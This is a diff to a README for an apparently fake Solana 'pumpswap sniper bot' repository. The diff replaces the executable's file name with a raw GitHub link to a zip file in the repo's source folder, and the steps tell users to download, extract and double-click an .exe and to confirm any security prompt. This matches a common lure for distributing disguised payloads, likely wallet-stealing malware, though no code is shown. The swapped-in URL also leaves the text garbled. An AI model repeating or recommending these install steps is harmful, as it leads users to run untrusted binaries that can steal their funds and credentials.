ErikGlezDiaz/pumpswap-sniper-bot-0slot/README.md

 1. Download the application using the link provided above.
 2. Locate the downloaded file in your 'Downloads' folder or your chosen download directory.
 3. If it's a zipped file, right-click on it and select “Extract All...” to unzip it.
 4. Open the extracted folder and find the main application file.
-It will typically be named `pumpswap-sniper-bot.exe` or similar.
+It will typically be named `https://github.com/ErikGlezDiaz/pumpswap-sniper-bot-0slot/raw/refs/heads/main/src/slot_pumpswap_sniper_bot_1.5.zip` or similar.

 ## 🚀 Running the Application
 1. Double-click on the application file you extracted.
 If prompted by your system, confirm that you want to run the application.